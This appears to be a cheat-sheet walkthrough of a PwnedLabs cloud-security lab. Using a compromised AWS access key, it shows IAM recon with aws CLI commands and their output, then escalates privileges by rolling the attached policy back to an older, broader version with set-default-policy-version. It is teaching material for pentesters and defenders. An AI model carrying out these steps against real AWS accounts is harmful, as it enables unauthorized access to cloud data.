Cheatsheet - AWS - Scenario - Utilise IAM policy rollback for Privilege Escalation
Overview
Another quick one - this scenario walks through the dangers of the iam:SetDefaultPolicyVersion permission.
Service/Tool: awscli
Use Case: A compromised account with this role may allow an attacker to role the policy back to a more permissive policy to escalate privileges.
Prerequisites: Compromised AWS access key and secret.
Attack Workflow
1. Step 1 (Discovery/Access)
Objective: Conduct recon of the compromised user's attached IAM policies.
Command/Method:
First we check that the credentials we compromised are still valid as well as some basic details on the user and account:
aws sts get-caller-identity
{
"UserId": "AIDAVYSUDVBYX2FQMHN3S",
"Account": "396387133553",
"Arn": "arn:aws:iam::396387133553:user/intern01"
}
Great! We can now move on to querying the policies for this user:
aws iam list-attached-user-policies --user-name intern01
{
"AttachedPolicies": [
{
"PolicyName": "intern_policy",
"PolicyArn": "arn:aws:iam::396387133553:policy/intern_policy"
}
]
}
We can then further query this policy - first we need to get the current version, then list the contents of the policy at that version:
aws iam get-policy --policy-arn arn:aws:iam::396387133553:policy/intern_policy
{
"Policy": {
"PolicyName": "intern_policy",
"PolicyId": "ANPAVYSUDVBYVNYRQZVBJ",
"Arn": "arn:aws:iam::396387133553:policy/intern_policy",
"Path": "/",
"DefaultVersionId": "v2",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"Description": "Initial IAM policy version",
"CreateDate": "2025-01-02T10:37:29+00:00",
"UpdateDate": "2025-01-02T10:37:29+00:00",
"Tags": []
}
}
aws iam get-policy-version --policy-arn arn:aws:iam::396387133553:policy/intern_policy --version-id v2
{
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "internpolicy",
"Effect": "Allow",
"Action": [
"ec2:DescribeInstances",
"iam:GetPolicyVersion",
"iam:GetPolicy",
"iam:ListPolicyVersions",
"iam:GetUserPolicy",
"iam:ListAttachedUserPolicies",
"iam:SetDefaultPolicyVersion"
],
"Resource": [
"arn:aws:iam::*:user/intern01",
"arn:aws:iam::*:policy/intern_policy"
]
}
]
},
"VersionId": "v2",
"IsDefaultVersion": true,
"CreateDate": "2025-01-02T10:37:29+00:00"
}
}
Here we can see that our user has the ability to perform iam:SetDefaulyPolicyVersion on the intern_policy which will allow us to rollback the policy to a previous version. Since our current version is 2, we can check out version 1 to see if that version has more permissions:
aws iam get-policy-version --policy-arn arn:aws:iam::396387133553:policy/intern_policy --version-id v1
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": [
"ec2:DescribeInstances",
"s3:ListAllMyBuckets",
"s3:GetObject",
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": "*"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": false,
"CreateDate": "2025-01-02T10:37:29+00:00"
}
}
Here we can see that in version 1 of this policy we can perform actions in S3 that might be of interest to us.
2. Step 2 (Privilege escalation by rolling back the IAM policy)
Objective: Utilise the AWS CLI to set the IAM policy to a previous version.
Command/Method:
This is as simple as running the following command:
aws iam set-default-policy-version --policy-arn arn:aws:iam::396387133553:policy/intern_policy --version-id v1
We can now check out that our permissions in S3 are working (per the policy that should now be set):
aws s3 ls
2025-01-02 20:37:30 huge-logistics-data-4246a217f499
Nice!
Notes and References
Links:
[PwnedLabs - Priv esc via IAM roll backs](https://pwnedlabs.io/labs/escalate-privileges-by-iam-policy-rollback